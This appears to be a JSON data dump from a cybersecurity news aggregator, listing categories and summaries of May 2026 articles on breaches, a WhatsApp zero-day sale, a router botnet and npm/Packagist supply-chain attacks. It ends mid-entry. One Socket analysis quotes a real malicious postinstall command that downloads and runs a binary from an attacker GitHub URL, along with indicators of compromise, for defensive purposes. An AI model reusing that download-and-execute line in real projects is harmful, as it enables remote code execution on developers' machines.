[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f6xj-Bmf7UMf1JTqhSxoeEmhgwzuTQadl8YytG99OYbo":3,"$f6ximpnJsNd5_Lf3G00HEZ33pOIyuvS0umlqXrntW0nE":192},{"items":4},[5,11,17,23,29,35,41,47,53,59,65,70,76,80,86,92,98,104,110,116,122,128,134,140,144,150,156,162,167,172,177,182,187],{"id":6,"name":7,"slug":8,"description":9,"icon":9,"sort_order":10},"80544778-fabb-4dcd-aa35-17492e5dcf4f","Vulnerabilities","vulnerabilities",null,10,{"id":12,"name":13,"slug":14,"description":15,"icon":9,"sort_order":16},"574f766a-fb3f-487c-8d2c-0720ae75471b","Zero-day","zero-day","Zero-day exploits and active exploitation",11,{"id":18,"name":19,"slug":20,"description":21,"icon":9,"sort_order":22},"26b0b636-0e31-4db1-bffb-61bdf9f20a58","Supply Chain","supply-chain","Supply chain attacks, dependency poisoning, build compromise",12,{"id":24,"name":25,"slug":26,"description":27,"icon":9,"sort_order":28},"6cbdd207-aaa1-4176-9534-e156b125e917","Nation-state","nation-state","State-sponsored campaigns, APT operations, cyber warfare",13,{"id":30,"name":31,"slug":32,"description":33,"icon":9,"sort_order":34},"c5eccf7c-abbc-4bd3-bbed-e6da5cba8e73","Incident Response","incident-response","IR playbooks, post-incident analysis, forensics",14,{"id":36,"name":37,"slug":38,"description":39,"icon":9,"sort_order":40},"2c8f44d4-b56e-47cf-9677-04f22c9ee78d","Identity & Access","identity-access","IAM, MFA bypass, credential theft, authentication",15,{"id":42,"name":43,"slug":44,"description":45,"icon":9,"sort_order":46},"d6f63bb8-0801-486a-be7f-171400700454","IoT\u002FOT","iot-ot","IoT\u002FOT security, industrial control systems, embedded devices",16,{"id":48,"name":49,"slug":50,"description":51,"icon":9,"sort_order":52},"0493c7e9-989a-4692-b4e6-136f5ec09675","Cryptography","cryptography","Encryption, quantum threats, protocol weaknesses",17,{"id":54,"name":55,"slug":56,"description":57,"icon":9,"sort_order":58},"53f9c4b6-8bc6-4964-9169-d09e5cd41d72","Compliance","compliance","GDPR, NIS2, SEC rules, regulatory frameworks",18,{"id":60,"name":61,"slug":62,"description":63,"icon":9,"sort_order":64},"ade75414-7914-4e23-a450-48b64546ee70","Open Source","open-source","OSS vulnerabilities, package security, dependency risks",19,{"id":66,"name":67,"slug":68,"description":9,"icon":9,"sort_order":69},"2e06f76c-d5b9-4f54-9eef-4d3447b10730","Breaches","breaches",20,{"id":71,"name":72,"slug":73,"description":74,"icon":9,"sort_order":75},"3f0f8451-91df-4b6c-9a73-ef3b2509b7f1","GDPR","gdpr","EU General Data Protection Regulation",30,{"id":77,"name":78,"slug":79,"description":9,"icon":9,"sort_order":75},"89f78b1c-3503-45a1-9fc7-e23d2ce1c6d5","Malware","malware",{"id":81,"name":82,"slug":83,"description":84,"icon":9,"sort_order":85},"5d60956f-4c0c-47c3-8db1-94240f816ce1","CCPA\u002FCPRA","ccpa-cpra","California Consumer Privacy Act",31,{"id":87,"name":88,"slug":89,"description":90,"icon":9,"sort_order":91},"fbace4ad-a9f5-407c-b73c-88cd9d221ecc","HIPAA","hipaa","US Health Insurance Portability and Accountability Act",32,{"id":93,"name":94,"slug":95,"description":96,"icon":9,"sort_order":97},"4fd32ef4-29b8-4ee4-b88f-ecfb77fbf9c1","NIS2","nis2","EU Network and Information Security Directive",33,{"id":99,"name":100,"slug":101,"description":102,"icon":9,"sort_order":103},"09099139-1092-4178-99da-99332cd1582f","PCI-DSS","pci-dss","Payment Card Industry Data Security Standard",34,{"id":105,"name":106,"slug":107,"description":108,"icon":9,"sort_order":109},"ca424fe9-cd56-4073-9d6a-9bb050d4bb8f","DORA","dora","Digital Operational Resilience Act",35,{"id":111,"name":112,"slug":113,"description":114,"icon":9,"sort_order":115},"d95477d7-eb04-4fad-a2dc-be1428040ce7","Privacy Fines","privacy-fines","DPA enforcement actions and penalties",36,{"id":117,"name":118,"slug":119,"description":120,"icon":9,"sort_order":121},"23e81061-ab06-449f-8807-cbe4bc305045","UK Data Protection","uk-data-protection","UK GDPR and Data Protection Act 2018",37,{"id":123,"name":124,"slug":125,"description":126,"icon":9,"sort_order":127},"f22671ea-092b-4568-aede-526bb16dedd5","EU AI Act","eu-ai-act","EU AI Act — artificial intelligence regulation and compliance",38,{"id":129,"name":130,"slug":131,"description":132,"icon":9,"sort_order":133},"ef42c16c-f41b-4794-8148-5fa5cb7b41b0","Cyber Resilience Act","eu-cyber-resilience-act","EU Cyber Resilience Act (CRA) — product cybersecurity requirements",39,{"id":135,"name":136,"slug":137,"description":138,"icon":9,"sort_order":139},"6e35e56d-89a7-4c72-9501-954aa9dd3449","EU Cybersecurity Act","eu-cybersecurity-act","EU Cybersecurity Act — ENISA mandate and certification schemes",40,{"id":141,"name":142,"slug":143,"description":9,"icon":9,"sort_order":139},"7d8b5ab8-ea0b-4ced-ae97-ec251b86993a","Ransomware","ransomware",{"id":145,"name":146,"slug":147,"description":148,"icon":9,"sort_order":149},"233dac9c-6b5b-4d83-9d6b-902ec3ffd7f2","DSA\u002FDMA","dsa-dma","EU Digital Services Act \u002F Digital Markets Act",41,{"id":151,"name":152,"slug":153,"description":154,"icon":9,"sort_order":155},"217d3263-c763-41ca-875e-06901f522fe0","NIST","nist","NIST CSF, 800-series, US federal cybersecurity standards",42,{"id":157,"name":158,"slug":159,"description":160,"icon":9,"sort_order":161},"a53e88d4-7e4c-481a-b387-3ea4c84f4919","SEC Cyber Rules","sec-cyber","SEC cyber disclosure rules and enforcement",43,{"id":163,"name":164,"slug":165,"description":9,"icon":9,"sort_order":166},"c5c77cdb-f7d7-4990-9436-c81dcbff1163","Policy","policy",50,{"id":168,"name":169,"slug":170,"description":9,"icon":9,"sort_order":171},"02371804-cf6d-4449-98de-f1a2d4d9b266","Tools","tools",60,{"id":173,"name":174,"slug":175,"description":9,"icon":9,"sort_order":176},"c70f3a41-2f0c-4608-870d-b8cbcd8be076","Cloud Security","cloud-security",70,{"id":178,"name":179,"slug":180,"description":9,"icon":9,"sort_order":181},"839da5c1-3c34-47e2-9499-f7201640e3ac","AI Security","ai-security",80,{"id":183,"name":184,"slug":185,"description":9,"icon":9,"sort_order":186},"e7b231c8-5f79-4465-8d38-1ef13aea5a14","Threat Intelligence","threat-intelligence",90,{"id":188,"name":189,"slug":190,"description":9,"icon":9,"sort_order":191},"614132b8-5837-4952-b8b5-c6c9a32a1d85","Privacy","privacy",100,{"items":193,"nextOffset":69,"hasMore":378},[194,216,231,247,261,281,301,315,331,347,364,380,397,414,426,440,460,478,495,512],{"id":195,"title":196,"slug":197,"url":198,"summary":199,"ai_summary":200,"parent_article_id":9,"relation_type":9,"image_url":201,"verify_count":202,"avg_score":9,"score_count":202,"published_at":203,"ingested_at":204,"source":205,"category":209,"tags":210,"ioc_count":214,"has_awareness_lesson":215,"awareness_lesson_id":9},"fc2aa533-2f4a-4943-a4ef-a78265a5f8a9","🚨WhatsApp zero-day exploit allegedly advertised for sale\n\nA threat actor on an underground forum...","whatsapp-zero-day-exploit-allegedly-advertised-for-sale-a-threat-actor-on-an-und-a46602","https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058257939362627626","🚨WhatsApp zero-day exploit allegedly advertised for sale\n\nA threat actor on an underground forum is claiming to sell a WhatsApp zero-day exploit allegedly capable of installing malware or backdoors through private messages.\n\nThe actor claims the exploit works on phones and https:\u002F\u002Ft.co\u002FPcdVSP82Uq","A threat actor is advertising a WhatsApp zero-day exploit for sale on an underground forum, claiming it can install malware or backdoors via private messages. The exploit allegedly works on both phones and desktop platforms. Details remain limited pending further investigation.","https:\u002F\u002Fpbs.twimg.com\u002Fmedia\u002FHJBmowuXAAAMDOf.jpg",0,"2026-05-23T18:45:07+00:00","2026-05-23T19:00:07.471572+00:00",{"id":206,"url":207,"name":208},"cbacbff4-323e-4947-9f55-74f2c7c7d1be","https:\u002F\u002Fapi.twitter.com\u002F2\u002Ftweets\u002Fsearch\u002Frecent","X \u002F Twitter",{"id":12,"icon":9,"name":13,"slug":14,"description":15},[211,212,213],{"id":6,"slug":8,"name":7},{"id":77,"slug":79,"name":78},{"id":183,"slug":185,"name":184},1,false,{"id":217,"title":218,"slug":219,"url":220,"summary":221,"ai_summary":222,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":223,"ingested_at":224,"source":225,"category":226,"tags":227,"ioc_count":202,"has_awareness_lesson":215,"awareness_lesson_id":9},"88b3789e-22c1-4c88-bd0b-8ffc2e74d02d","🚨🇨🇱 Chilean Fire Department System Allegedly Breached: VIPER Platform Records and Internal Doc...","chilean-fire-department-system-allegedly-breached-viper-platform-records-and-int-d9f9bd","https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058217725382561879","🚨🇨🇱 Chilean Fire Department System Allegedly Breached: VIPER Platform Records and Internal Documents Exposed\n\nhttps:\u002F\u002Ft.co\u002Fs6fHnnKxCo","The Chilean Fire Department's VIPER platform has been reportedly breached, with threat actors claiming to have accessed internal records and documents. The breach exposes sensitive operational data from a critical emergency response organization. The incident highlights vulnerabilities in government infrastructure security.","2026-05-23T16:05:20+00:00","2026-05-23T17:00:08.224568+00:00",{"id":206,"url":207,"name":208},{"id":66,"icon":9,"name":67,"slug":68,"description":9},[228,229,230],{"id":24,"slug":26,"name":25},{"id":30,"slug":32,"name":31},{"id":183,"slug":185,"name":184},{"id":232,"title":233,"slug":234,"url":235,"summary":236,"ai_summary":237,"parent_article_id":9,"relation_type":9,"image_url":238,"verify_count":202,"avg_score":9,"score_count":202,"published_at":239,"ingested_at":240,"source":241,"category":242,"tags":243,"ioc_count":202,"has_awareness_lesson":215,"awareness_lesson_id":9},"9d590759-1ff7-481e-b07f-777171f7ca18","🚨🇿🇦 Alleged data breach of South African Revenue Service (SARS) by Nullsec https:\u002F\u002Ft.co\u002FciUMwl...","alleged-data-breach-of-south-african-revenue-service-sars-by-nullsec-https-t-co--3af464","https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058214877831762189","🚨🇿🇦 Alleged data breach of South African Revenue Service (SARS) by Nullsec https:\u002F\u002Ft.co\u002FciUMwlwwXO","A threat actor or group operating under the moniker Nullsec has alleged a data breach of South Africa's Revenue Service (SARS). The claim includes purported exfiltration of sensitive data. Details remain limited pending verification of the breach's authenticity and scope.","https:\u002F\u002Fpbs.twimg.com\u002Fmedia\u002FHJA_ge6XQAAiH2Y.jpg","2026-05-23T15:54:01+00:00","2026-05-23T16:00:07.504385+00:00",{"id":206,"url":207,"name":208},{"id":66,"icon":9,"name":67,"slug":68,"description":9},[244,245,246],{"id":188,"slug":190,"name":189},{"id":24,"slug":26,"name":25},{"id":183,"slug":185,"name":184},{"id":248,"title":249,"slug":250,"url":251,"summary":252,"ai_summary":253,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":254,"ingested_at":240,"source":255,"category":256,"tags":257,"ioc_count":214,"has_awareness_lesson":215,"awareness_lesson_id":9},"b8cc999d-a068-43c6-8b3c-2691560886cb","🚨🇺🇸 WisERP Allegedly Targeted: 1.5M U.S. ERP Customer Records Advertised in Auction\n\nhttps:\u002F\u002Ft...","wiserp-allegedly-targeted-1-5m-u-s-erp-customer-records-advertised-in-auction-ht-b9df2f","https:\u002F\u002Fx.com\u002FDarkWebInformer\u002Fstatus\u002F2058212320468193384","🚨🇺🇸 WisERP Allegedly Targeted: 1.5M U.S. ERP Customer Records Advertised in Auction\n\nhttps:\u002F\u002Ft.co\u002FQDozfTkExf","WisERP, a U.S. enterprise resource planning (ERP) software provider, has allegedly been breached with approximately 1.5 million customer records now being advertised for sale on the dark web. The breach appears to affect a significant number of U.S. organizations that rely on the platform for critical business operations. This represents a supply-chain risk to all downstream customers and users of affected WisERP deployments.","2026-05-23T15:43:51+00:00",{"id":206,"url":207,"name":208},{"id":66,"icon":9,"name":67,"slug":68,"description":9},[258,259,260],{"id":18,"slug":20,"name":19},{"id":188,"slug":190,"name":189},{"id":183,"slug":185,"name":184},{"id":262,"title":263,"slug":264,"url":265,"summary":266,"ai_summary":267,"parent_article_id":9,"relation_type":9,"image_url":268,"verify_count":202,"avg_score":9,"score_count":202,"published_at":269,"ingested_at":270,"source":271,"category":275,"tags":276,"ioc_count":280,"has_awareness_lesson":215,"awareness_lesson_id":9},"76343cc5-0302-48ea-8ee1-aec0f1f9a5fc","RondoDox Botnet Exploits Critical 2018 Vulnerability to Hijack ASUS Routers","rondodox-botnet-exploits-critical-2018-vulnerability-to-hijack-asus-routers-88d656","https:\u002F\u002Fhackread.com\u002Frondodox-botnet-2018-vulnerability-hijack-asus-routers\u002F","Cybersecurity firm VulnCheck reveals hackers are using a critical 2018 vulnerability to bypass authentication and hack over a million ASUS routers.","VulnCheck discovered that the RondoDox botnet is actively exploiting CVE-2018-5999, a critical 2018 vulnerability in ASUS routers, to bypass authentication and hijack over 1 million devices. The vulnerability (CVSS 9.8\u002F10) allows unauthenticated attackers to modify router settings by manipulating the ateCommand_flag parameter. Though exploit code has been public since 2018, real-world exploitation only began in May 2026, with RondoDox using the compromised routers to launch DDoS attacks.","https:\u002F\u002Fhackread.com\u002Fwp-content\u002Fuploads\u002F2026\u002F05\u002Frondodox-botnet-2018-vulnerability-hijack-asus-routers-2.jpg","2026-05-23T11:16:40+00:00","2026-05-23T12:00:08.7051+00:00",{"id":272,"url":273,"name":274},"669622ac-ebeb-40b1-b887-4586dd6bb884","https:\u002F\u002Fwww.hackread.com\u002Ffeed\u002F","Hackread",{"id":77,"icon":9,"name":78,"slug":79,"description":9},[277,278,279],{"id":6,"slug":8,"name":7},{"id":42,"slug":44,"name":43},{"id":183,"slug":185,"name":184},3,{"id":282,"title":283,"slug":284,"url":285,"summary":286,"ai_summary":287,"parent_article_id":9,"relation_type":9,"image_url":288,"verify_count":202,"avg_score":9,"score_count":202,"published_at":289,"ingested_at":290,"source":291,"category":295,"tags":296,"ioc_count":300,"has_awareness_lesson":215,"awareness_lesson_id":9},"f1b72fff-ed9c-408d-b98e-4f021d170880","Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects","malicious-postinstall-hook-found-across-700-github-repositories-including-packag-4fdf9d","https:\u002F\u002Fsocket.dev\u002Fblog\u002Fmalicious-postinstall-hook-found-across-700-github-repos?utm_medium=feed","Socket researchers identified a coordinated supply chain campaign affecting eight Composer packages whose upstream repositories were modified to include the same malicious postinstall script. The script attempted to download a Linux binary from a GitHub Releases URL, save it to \u002Ftmp\u002F.sshd, make it executable, and run it in the background. The affected packages were all Composer packages, but the malicious code was not added to composer.json. Instead, it was inserted into package.json, targeting projects that ship JavaScript build tooling alongside PHP code. That cross-ecosystem placement is notable because developers and security teams reviewing PHP dependencies may focus on Composer metadata while overlooking package.json lifecycle hooks bundled inside the package. Socket’s AI scanner detected the campaign across eight branch-tracking package versions: Package Affected Version moritz-sauer-13\u002Fsilverstripe-cms-theme dev-master crosiersource\u002Fcrosierlib-base dev-master devdojo\u002Fwave dev-main devdojo\u002Fgenesis dev-main katanaui\u002Fkatana dev-main elitedevsquad\u002Fsidecar-laravel 3.x-dev r2luna\u002Fbrain dev-main baskarcm\u002Ftzi-chat-ui dev-main Socket’s AI scanner flagged all eight affected package artifacts after identifying the same suspicious install-time behavior across the set. We identified multiple packages with a postinstall hook that downloads an external binary and immediately executes it, often placing the file at \u002Ftmp\u002F.sshd, with weakened TLS verification and background execution. Broader GitHub Search Shows Hundreds of References # During the course of this investigation, Socket found that the campaign was not limited to the initial Packagist packages flagged by the AI scanner. A GitHub code search for the attacker-controlled account parikhpreyash4 returned hundreds of public code results approximately 17 hours after the first detection, including many Node.js repositories. Socket has not yet confirmed how many of those results represent distinct compromises, forks, duplicate package artifacts, or cached references. However, the volume of results tied to the same attacker infrastructure suggests a broader campaign involving the same package.json postinstall payload. The confirmed Packagist findings remain the clearest evidence available so far: eight PHP packages contained the same install-time command that downloaded gvfsd-network from the attacker-controlled GitHub Releases URL, wrote it to \u002Ftmp\u002F.sshd, made it executable, and launched it in the background. Follow-up GitHub searches indicate the same infrastructure may have been reused across a much wider set of JavaScript projects. Identical Payload Delivery # The malicious postinstall script was identical across the confirmed package artifacts: curl-skL https:\u002F\u002Fgithub.com\u002Fparikhpreyash4\u002Fsystemd-network-helper-aa5c751f\u002Freleases\u002Flatest\u002Fdownload\u002Fgvfsd-network-o \u002Ftmp\u002F.sshd2>\u002Fdev\u002Fnull &&chmod+x \u002Ftmp\u002F.sshd && \u002Ftmp\u002F.sshd & The command has several high-risk characteristics: It uses curl -k, disabling TLS certificate verification. It downloads a binary named gvfsd-network from GitHub Releases. It writes the binary to \u002Ftmp\u002F.sshd, a hidden filename that resembles an SSH daemon. It suppresses error output with 2>\u002Fdev\u002Fnull. It makes the file executable with chmod +x. It runs the binary in the background using &. Socket researchers were unable to retrieve the second-stage binary during follow-up because the GitHub-hosted payload was no longer available. However, the first-stage behavior is sufficient to classify the packages as malicious. The script downloads and executes an unauthenticated remote binary during installation with no integrity check, while suppressing errors and hiding the executable under a system-like filename. Malicious Commits in Upstream GitHub Repositories # moritz-sauer-13\u002Fsilverstripe-cms-theme Malicious commit: 7825479 Cleanup status: The hook was still present on master when checked. crosiersource\u002Fcrosierlib-base Malicious commit: 551c319 Cleanup status: The hook was still present on master when checked. thedevdojo\u002Fwave Malicious commit: 8f9127a Cleanup status: Reverted by 5afe6da. thedevdojo\u002Fgenesis Malicious commit: fe7b1cd Cleanup status: Reverted by 3be1f20. katanaui\u002Fkatana Malicious commit: a32f9e1 Cleanup status: Reverted by f679252. elitedevsquad\u002Fsidecar-laravel Malicious commit: ed6fd36 Cleanup status: Reverted by b1f5c53, titled security: revert malicious postinstall payload. r2luna\u002Fbrain Malicious commit: 85eca91 Cleanup status: Reverted by 421a1d5, titled security: revert malicious postinstall payload. baskarcm\u002Ftzi-chat-ui Malicious commit: 58fa0b2 Cleanup status: The hook was still present on main when checked. # The confirmed Packagist findings appear to stem from malicious commits made directly to upstream GitHub repositories. In each case, the attacker added the same package.json postinstall script to a repository that was tracked by Packagist. Once Packagist updated its branch-tracking package versions, those malicious repository states became infected package artifacts. The campaign was not necessarily aimed at Packagist itself. The attacker targeted source repositories, and Packagist reflected those changes through dev-main, dev-master, and 3.x-dev package versions. Several maintainers later reverted the malicious commits, which caused the current branch-tracking package views to move back to clean artifacts. The malicious code was placed in package.json, not composer.json, targeting repositories that included JavaScript build tooling alongside PHP code. In PHP projects, that placement can be easy to miss if defenders focus only on Composer metadata while overlooking JavaScript lifecycle scripts bundled in the same repository. Socket reported the affected packages to Packagist, which immediately removed them. Branch-Tracking Versions Complicate Response # Most affected versions were development branches, including dev-main, dev-master, and 3.x-dev. These are branch-tracking versions rather than immutable releases. This also affected remediation. Packagist temporarily deleted the affected package entries, but noted that branch-tracking packages could be restored on the next package update unless the upstream repository was fixed. For defenders, this means the affected version label alone is not enough. The relevant artifact should be tied to the observed commit or archive state when available. Potential for Execution # Two of the affected packages account for most of the practical risk. devdojo\u002Fwave is an open source Laravel SaaS starter kit with roughly 6,400 GitHub stars. devdojo\u002Fgenesis, from the same publisher, has about 1,300 stars and 9,100 Packagist installs. Its Packagist metadata describes it as a Laravel starter kit built with Tailwind CSS, Alpine.js, Laravel, Livewire, Folio, and Volt. Starter kits are the worst case for this attack pattern. The repository becomes the developer's project, so the malicious package.json lands at the project root, where npm install runs its postinstall script directly. For the other affected packages, which are libraries pulled into vendor\u002F, the postinstall hook does not fire from a top-level npm install, since npm only runs scripts for packages declared in the root project's dependencies. The remaining six affected Packagist packages appear to have much smaller adoption and more niche or personal use cases. That does not make the compromise benign, but it does concentrate the most likely real-world exposure in the starter kit projects. Recommendations # Teams using Packagist packages that include JavaScript build tooling should inspect bundled package.json files, not only composer.json. This is especially important for branch-tracking Composer dependencies, where the package contents can change as the upstream branch moves. Socket flagged the affected package artifacts as malicious based on their install-time behavior. The detected pattern matched a coordinated supply chain campaign: unrelated packages contained the same lifecycle hook, the same GitHub Releases payload URL, the same hidden local filename, and the same background execution chain. Even without the second-stage binary, the malicious installer is enough to warrant blocking. It provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors, and running a downloaded binary in the background. Indicators of Compromise # GitHub account: parikhpreyash4 GitHub repository: parikhpreyash4\u002Fsystemd-network-helper-aa5c751f Payload URL: https:\u002F\u002Fgithub.com\u002Fparikhpreyash4\u002Fsystemd-network-helper-aa5c751f\u002Freleases\u002Flatest\u002Fdownload\u002Fgvfsd-network Payload File Path: \u002Ftmp\u002F.sshd Suspicious command fragments: curl -skL chmod +x \u002Ftmp\u002F.sshd \u002Ftmp\u002F.sshd &","Socket researchers identified a coordinated supply chain campaign affecting eight Composer packages on Packagist, where upstream repositories were modified to include malicious postinstall scripts in package.json files. The scripts attempted to download a Linux binary named gvfsd-network from an attacker-controlled GitHub Releases URL, save it to \u002Ftmp\u002F.sshd, and execute it in the background with disabled TLS verification. A broader GitHub search revealed hundreds of additional references to the same attacker infrastructure across Node.js repositories, suggesting the campaign extends far beyond the confirmed Packagist findings.","https:\u002F\u002Fcdn.sanity.io\u002Fimages\u002Fcgdhsj6q\u002Fproduction\u002Fd66a69ec89dc89742b33b6b178982263b5f44386-1672x941.png?w=1000&q=95&fit=max&auto=format","2026-05-22T21:03:29.112+00:00","2026-05-22T22:00:21.049859+00:00",{"id":292,"url":293,"name":294},"30adb488-0f84-4546-a81c-ab52a7489b84","https:\u002F\u002Fsocket.dev\u002Fapi\u002Fblog\u002Ffeed.atom","SocketDev",{"id":18,"icon":9,"name":19,"slug":20,"description":21},[297,298,299],{"id":77,"slug":79,"name":78},{"id":60,"slug":62,"name":61},{"id":183,"slug":185,"name":184},2,{"id":302,"title":303,"slug":304,"url":305,"summary":306,"ai_summary":307,"parent_article_id":9,"relation_type":9,"image_url":9,"verify_count":202,"avg_score":9,"score_count":202,"published_at":308,"ingested_at":309,"source":310,"category":311,"tags":312,"ioc_count":214,"has_awareness_lesson":215,"awareness_lesson_id":9},"fdb6209c-f668-4c74-ae62-ebb67cbcecb4","RT @CISACyber: 🛡️ We added Drupal core SQL injection vulnerability CVE-2026-9082 to our KEV Cata...","rt-cisacyber-we-added-drupal-core-sql-injection-vulnerability-cve-2026-9082-to-o-02c8ea","https:\u002F\u002Fx.com\u002FCISAgov\u002Fstatus\u002F2057893782339592352","RT @CISACyber: 🛡️ We added Drupal core SQL injection vulnerability CVE-2026-9082 to our KEV Catalog. Visit https:\u002F\u002Ft.co\u002FmyxOwap1Tf for more…","CISA has added CVE-2026-9082, a SQL injection vulnerability in Drupal core, to its Known Exploited Vulnerabilities (KEV) catalog. The addition indicates this vulnerability is being actively exploited in the wild and organizations should prioritize patching. Administrators running Drupal should apply available security updates immediately.","2026-05-22T18:38:06+00:00","2026-05-22T19:00:12.71472+00:00",{"id":206,"url":207,"name":208},{"id":6,"icon":9,"name":7,"slug":8,"description":9},[313,314],{"id":6,"slug":8,"name":7},{"id":60,"slug":62,"name":61},{"id":316,"title":317,"slug":318,"url":319,"summary":320,"ai_summary":321,"parent_article_id":9,"relation_type":9,"image_url":322,"verify_count":202,"avg_score":9,"score_count":202,"published_at":323,"ingested_at":324,"source":325,"category":326,"tags":327,"ioc_count":202,"has_awareness_lesson":215,"awareness_lesson_id":9},"971838a3-7c15-45ba-85b7-e1d3fcaac759","AI Has Taken Over Open Source","ai-has-taken-over-open-source-079c96","https:\u002F\u002Fsocket.dev\u002Fblog\u002Fai-has-taken-over-open-source?utm_medium=feed","I’ve spent a lot of time looking at what the data reveals about open source, from the speed at which open source alternatives emerge to how maintainer compensation compares with the broader software industry. I’m interested in what the data says, not in predictions based on anecdotes. At Socket, I've had the privilege of accessing our massive database across all major ecosystems, including npm, PyPI, Go, and Rust. We essentially replicate all open source packages, including the very fringe cases. Within minutes, a nefarious package is replicated, analyzed, and reported to our customers. This unparalleled, real-time visibility into the entire software supply chain has surfaced unique and often surprising insights as our industry has rushed into the AI era. Socket was created just before “vibe coding” was coined as a term, and we have had a front-row seat to observe how it is impacting the open source community. I found three interesting insights that I want to share with you today, all related to AI coding trends: the number of packages on npm is growing exponentially, pull requests and contributions are increasingly seen negatively by maintainers, and dependency shopping is on a downward spiral. AI is driving the production and consumption of open source, as well as fundamentally transforming the dynamics between maintainers and contributors. The Rising Tide of Packages # Last year, I took a deep dive into Socket's package database, and I developed a theory that npm might have reached its peak. The explosive surge that defined the 2013 to 2016 period seems to have leveled off. I remember that a decade ago, the developer community was using the term \"JavaScript fatigue\" to describe the then-normal torrent of new tools and ways of working. Since then, the ecosystem has moved toward a more predictable cadence, and those familiar frustrations within the community have largely quieted down. Everything changed in January 2026. AI coding tools became so effective at producing working code, that they became the driver of many developers' workflow to produce side-projects, open source packages, automations, and enterprise source code. This is visible in open source ecosystems such as npm. I compiled the following chart from Socket’s database, where I spread all packages by their creation date over time, and measured how many such packages exist per creation-month. To ignore fake packages, dead packages, and other registry-abusing cases, I added a filter for packages that have at least 100 weekly downloads. Thus this counts the real and reusable packages. There is an unprecedented pattern going on. While it is possible the recent spike includes packages gaming the system for artificial popularity, we haven’t seen this kind of sudden growth in 15 years of npm. The immediate question is: where do they come from? How can there be this many? Even during the periods when there were swarms of prolific developers publishing as many packages as they humanly could, we did not reach the mark of 10,000 real and reusable packages per month. It seems like something superhuman is happening. This sparked my curiosity and I pondered how I could distinguish which of these packages were “written by AI”. Trying to differentiate between human machine output is a challenge that borders on a modern Turing test. That said, fortunately current AI coding tools are unusually fond of em dashes. So for the time being, they give themselves away easily. I measured the number of packages published recently, and the proportion of those which had em dashes in their README files, and the following chart was produced. (Please note that this was produced mid-May 2026, so the count of packages in May is still incomplete) It is normal to expect approximately 5% of em dash “background radiation” produced by humans, so the recent sharp increase in em dash usage (30%+) indicates that AI is indeed employed in the creation of new npm packages. It is more than doubling the number of packages per month. Maintenance Fatigue: PRs not welcome # AI coding tools are used not only for the creation of new packages but also for contributing pull requests to existing open source projects. Given the normalization of AI assistance in most IDEs, this is not surprising. What's new is the flood of low-quality and often automated pull requests, which bypass human interaction, spamming maintainers with noise. Maintainers of projects such as curl, Godot, Ghostty, tldraw, and others are now vocally describing contributions in a negative light. Some are resorting to disabling pull requests entirely, others are considering how contributor allowlists could be an answer. It was once standard practice in the open source community to use \"good first issue\" labels to encourage and onboard new programmers. Yet, this label is increasingly counterproductive, often attracting AI automation executing on a user's instruction. As a result, contributions are now often leveraged to boost online presence and popularity, eroding the culture of solidarity that historically defined the open source ethos. AI is reshaping the work of maintainers as much as it is reshaping the work of contributors. Maintainers are now using those tools to help reviewing pull requests, or to simply rewrite the contribution from scratch given the maintainer’s better-informed prompt. Software Supply Chain as a Black Box # We built Socket’s package search feature – free for everyone – to support “dependency shopping”. This is the process of searching for suitable dependencies, filtering away the fake and the unpopular, and assessing many other criteria. Let’s take a look at how this too was impacted by AI recently. What simple “health indicator” for dependency shopping could we probe? In modern software development, UI components for routine tasks like date selection are a fundamental requirement. However, when I examined Google Search trends for “date pickers” in the past 4 years, I discovered a surprisingly consistent decline: Based on the chart above, one might be inclined to conclude that React date pickers are on their way out of software being produced lately. Contrarily, the statistical data for downloads regarding this specific package reveals a conflicting narrative: react-datepicker usage is steadily growing, and even picking up more steam in 2026! Open source used to be consumed consciously, intentionally and informed by package popularity or human review. This is no longer true. Developers more and more rely on their AI coding tools to build entire features or products, and in the process include the packages deemed necessary. Packages themselves used to contain transitive dependencies that were hand-picked by maintainers. That is also no longer true. The result is that AI is now primarily in control of software supply chains. There are other fields disrupted by AI, such as image generation or the production of music, but software is uniquely impacted. AI is now driving both the production and consumption of open source software. AI-generated music ends in human ears, and AI-generated images mostly benefit humans, but AI-generated software is an ouroboros (a snake eating its own tail) which is just getting started. The software that AI writes is often good, and the open source packages it chooses for consumption are by and large better than what humans would choose. But the fact remains that the software supply chain is now an automated black box, fundamentally changing the landscape of security and transparency. It is not feasible to manually review every new dependency selection, and the pace of AI-accelerated productivity reduces the economic benefit of pausing to inspect the packages and their source code. The only viable solution to remain secure in this new world ridden with malware campaigns is to automate the scanning of third-party code to surface risk indicators based on how that code behaves. Developers are moving faster, tools are making more decisions on their behalf, and the supply chain is becoming too large and too automated for manual review to remain the primary defense. That does not mean open source is going away. It is human nature to share useful things with the wider community. But in a world where AI is helping produce, select, and install open source packages, automated analysis of third-party code becomes a baseline requirement for production software.","Socket's analysis reveals AI coding tools have fundamentally transformed npm's ecosystem, driving a 10x increase in package creation since January 2026, identifiable by linguistic markers like em dashes. Simultaneously, AI-generated pull requests are overwhelming maintainers, while AI-driven dependency selection has made the software supply chain largely automated and opaque, creating significant supply-chain security risks that require automated scanning rather than manual review.","https:\u002F\u002Fcdn.sanity.io\u002Fimages\u002Fcgdhsj6q\u002Fproduction\u002F28afd79494a5eae74cf7afee8124384497cef27a-1672x941.png?w=1000&q=95&fit=max&auto=format","2026-05-22T14:22:05.743+00:00","2026-05-22T16:00:15.424118+00:00",{"id":292,"url":293,"name":294},{"id":18,"icon":9,"name":19,"slug":20,"description":21},[328,329,330],{"id":178,"slug":180,"name":179},{"id":60,"slug":62,"name":61},{"id":183,"slug":185,"name":184},{"id":332,"title":333,"slug":334,"url":335,"summary":336,"ai_summary":337,"parent_article_id":9,"relation_type":9,"image_url":338,"verify_count":202,"avg_score":9,"score_count":202,"published_at":339,"ingested_at":340,"source":341,"category":342,"tags":343,"ioc_count":300,"has_awareness_lesson":215,"awareness_lesson_id":9},"19a1e6ec-ed96-4ada-a1eb-a6c306e33d45","5,561 GitHub Repositories Hit by Megalodon Supply Chain Attack in Six 